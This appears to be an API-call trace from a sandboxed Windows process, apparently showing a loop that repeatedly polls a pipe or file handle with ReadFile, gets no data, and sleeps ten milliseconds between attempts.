	[0222.395] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.395] GetLastError () returned 0x218
	[0222.395] Sleep (dwMilliseconds=0xa) 
	[0222.451] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.451] GetLastError () returned 0x218
	[0222.451] Sleep (dwMilliseconds=0xa) 
	[0222.482] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.482] GetLastError () returned 0x218
	[0222.482] Sleep (dwMilliseconds=0xa) 
	[0222.488] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.488] GetLastError () returned 0x218
	[0222.488] Sleep (dwMilliseconds=0xa) 
	[0222.504] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.504] GetLastError () returned 0x218
	[0222.504] Sleep (dwMilliseconds=0xa) 
	[0222.519] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.519] GetLastError () returned 0x218
	[0222.519] Sleep (dwMilliseconds=0xa) 
	[0222.535] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.535] GetLastError () returned 0x218
	[0222.535] Sleep (dwMilliseconds=0xa) 
	[0222.551] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.551] GetLastError () returned 0x218
	[0222.551] Sleep (dwMilliseconds=0xa) 
	[0222.567] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.567] GetLastError () returned 0x218
	[0222.567] Sleep (dwMilliseconds=0xa) 
	[0222.582] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.582] GetLastError () returned 0x218
	[0222.582] Sleep (dwMilliseconds=0xa) 
	[0222.629] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.629] GetLastError () returned 0x218
	[0222.629] Sleep (dwMilliseconds=0xa) 
	[0222.675] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.675] GetLastError () returned 0x218
	[0222.675] Sleep (dwMilliseconds=0xa) 
	[0222.704] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.704] GetLastError () returned 0x218
	[0222.704] Sleep (dwMilliseconds=0xa) 
	[0222.706] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.707] GetLastError () returned 0x218
	[0222.707] Sleep (dwMilliseconds=0xa) 
	[0222.722] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.722] GetLastError () returned 0x218
	[0222.722] Sleep (dwMilliseconds=0xa) 
	[0222.739] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.739] GetLastError () returned 0x218
	[0222.739] Sleep (dwMilliseconds=0xa) 
	[0222.754] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.754] GetLastError () returned 0x218
	[0222.754] Sleep (dwMilliseconds=0xa) 
	[0222.769] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.770] GetLastError () returned 0x218
	[0222.770] Sleep (dwMilliseconds=0xa) 
	[0222.785] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.785] GetLastError () returned 0x218
	[0222.786] Sleep (dwMilliseconds=0xa) 
	[0222.801] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.801] GetLastError () returned 0x218
	[0222.801] Sleep (dwMilliseconds=0xa) 
	[0222.847] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.847] GetLastError () returned 0x218
	[0222.847] Sleep (dwMilliseconds=0xa) 
	[0222.906] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.906] GetLastError () returned 0x218
	[0222.906] Sleep (dwMilliseconds=0xa) 
	[0222.941] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.941] GetLastError () returned 0x218
	[0222.941] Sleep (dwMilliseconds=0xa) 
	[0222.956] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.956] GetLastError () returned 0x218
	[0222.956] Sleep (dwMilliseconds=0xa) 
	[0222.973] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.973] GetLastError () returned 0x218
	[0222.973] Sleep (dwMilliseconds=0xa) 
	[0222.988] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.988] GetLastError () returned 0x218
	[0222.988] Sleep (dwMilliseconds=0xa) 
	[0223.004] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.004] GetLastError () returned 0x218
	[0223.005] Sleep (dwMilliseconds=0xa) 
	[0223.020] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.020] GetLastError () returned 0x218
	[0223.020] Sleep (dwMilliseconds=0xa) 
	[0223.035] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.035] GetLastError () returned 0x218
	[0223.035] Sleep (dwMilliseconds=0xa) 
	[0223.051] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.051] GetLastError () returned 0x218
	[0223.051] Sleep (dwMilliseconds=0xa) 
	[0223.097] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.097] GetLastError () returned 0x218
	[0223.097] Sleep (dwMilliseconds=0xa) 
	[0223.159] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.159] GetLastError () returned 0x218
	[0223.159] Sleep (dwMilliseconds=0xa) 
	[0223.208] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.208] GetLastError () returned 0x218
	[0223.208] Sleep (dwMilliseconds=0xa) 
	[0223.222] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.222] GetLastError () returned 0x218
	[0223.222] Sleep (dwMilliseconds=0xa) 
	[0223.238] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.238] GetLastError () returned 0x218
	[0223.238] Sleep (dwMilliseconds=0xa) 
	[0223.253] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.253] GetLastError () returned 0x218
	[0223.253] Sleep (dwMilliseconds=0xa) 
	[0223.270] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.270] GetLastError () returned 0x218
	[0223.270] Sleep (dwMilliseconds=0xa) 
	[0223.284] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.284] GetLastError () returned 0x218
	[0223.284] Sleep (dwMilliseconds=0xa) 
	[0223.301] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.301] GetLastError () returned 0x218
	[0223.301] Sleep (dwMilliseconds=0xa) 
	[0223.316] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.316] GetLastError () returned 0x218
	[0223.316] Sleep (dwMilliseconds=0xa) 
	[0223.362] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.362] GetLastError () returned 0x218
	[0223.362] Sleep (dwMilliseconds=0xa) 
	[0223.398] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.398] GetLastError () returned 0x218
	[0223.398] Sleep (dwMilliseconds=0xa) 
	[0223.439] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.439] GetLastError () returned 0x218
	[0223.439] Sleep (dwMilliseconds=0xa) 
	[0223.452] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.452] GetLastError () returned 0x218
	[0223.452] Sleep (dwMilliseconds=0xa) 
	[0223.456] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.456] GetLastError () returned 0x218
	[0223.456] Sleep (dwMilliseconds=0xa) 
	[0223.471] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.471] GetLastError () returned 0x218
	[0223.471] Sleep (dwMilliseconds=0xa) 
	[0223.487] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.487] GetLastError () returned 0x218
	[0223.487] Sleep (dwMilliseconds=0xa) 
	[0223.502] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.502] GetLastError () returned 0x218
	[0223.503] Sleep (dwMilliseconds=0xa) 
	[0223.519] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.519] GetLastError () returned 0x218
	[0223.519] Sleep (dwMilliseconds=0xa) 
	[0223.534] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.534] GetLastError () returned 0x218
	[0223.534] Sleep (dwMilliseconds=0xa) 
	[0223.580] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.580] GetLastError () returned 0x218
	[0223.581] Sleep (dwMilliseconds=0xa) 
	[0223.627] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.627] GetLastError () returned 0x218
	[0223.627] Sleep (dwMilliseconds=0xa) 
	[0223.659] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.659] GetLastError () returned 0x218
	[0223.659] Sleep (dwMilliseconds=0xa) 
	[0223.674] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.674] GetLastError () returned 0x218
	[0223.674] Sleep (dwMilliseconds=0xa) 
	[0223.690] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.690] GetLastError () returned 0x218
	[0223.690] Sleep (dwMilliseconds=0xa) 
	[0223.706] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.706] GetLastError () returned 0x218
	[0223.706] Sleep (dwMilliseconds=0xa) 
	[0223.722] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.722] GetLastError () returned 0x218
	[0223.722] Sleep (dwMilliseconds=0xa) 
	[0223.737] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.737] GetLastError () returned 0x218
	[0223.738] Sleep (dwMilliseconds=0xa) 
	[0223.754] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.754] GetLastError () returned 0x218
	[0223.754] Sleep (dwMilliseconds=0xa) 
	[0223.768] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.768] GetLastError () returned 0x218
	[0223.768] Sleep (dwMilliseconds=0xa) 
	[0223.812] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.812] GetLastError () returned 0x218
	[0223.812] Sleep (dwMilliseconds=0xa) 
	[0223.845] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.846] GetLastError () returned 0x218
	[0223.846] Sleep (dwMilliseconds=0xa) 
	[0223.892] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.892] GetLastError () returned 0x218
	[0223.892] Sleep (dwMilliseconds=0xa) 
	[0223.908] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.908] GetLastError () returned 0x218
	[0223.908] Sleep (dwMilliseconds=0xa) 
	[0223.925] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.925] GetLastError () returned 0x218
	[0223.925] Sleep (dwMilliseconds=0xa) 
	[0223.950] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.951] GetLastError () returned 0x218
	[0223.951] Sleep (dwMilliseconds=0xa) 
	[0223.955] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.955] GetLastError () returned 0x218
	[0223.955] Sleep (dwMilliseconds=0xa) 
	[0223.971] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.971] GetLastError () returned 0x218
	[0223.971] Sleep (dwMilliseconds=0xa) 
	[0223.986] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0223.986] GetLastError () returned 0x218
	[0223.986] Sleep (dwMilliseconds=0xa) 
	[0224.002] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0224.002] GetLastError () returned 0x218
	[0224.002] Sleep (dwMilliseconds=0xa) 
	[0224.048] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0224.048] GetLastError () returned 0x218
	[0224.048] Sleep (dwMilliseconds=0xa) 
	[0224.095] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0224.095] GetLastError () returned 0x218
	[0224.095] Sleep (dwMilliseconds=0xa) 
	[0224.128] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0224.128] GetLastError () returned 0x218
	[0224.128] Sleep (dwMilliseconds=0xa) 
	[0224.175] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0224.175] GetLastError () returned 0x218
	[0224.176] Sleep (dwMilliseconds=0xa) 
	[0224.190] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0224.190] GetLastError () returned 0x218
	[0224.190] Sleep (dwMilliseconds=0xa) 
	[0224.204] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0224.204] GetLastError () returned 0x218
	[0224.205] Sleep (dwMilliseconds=0xa) 
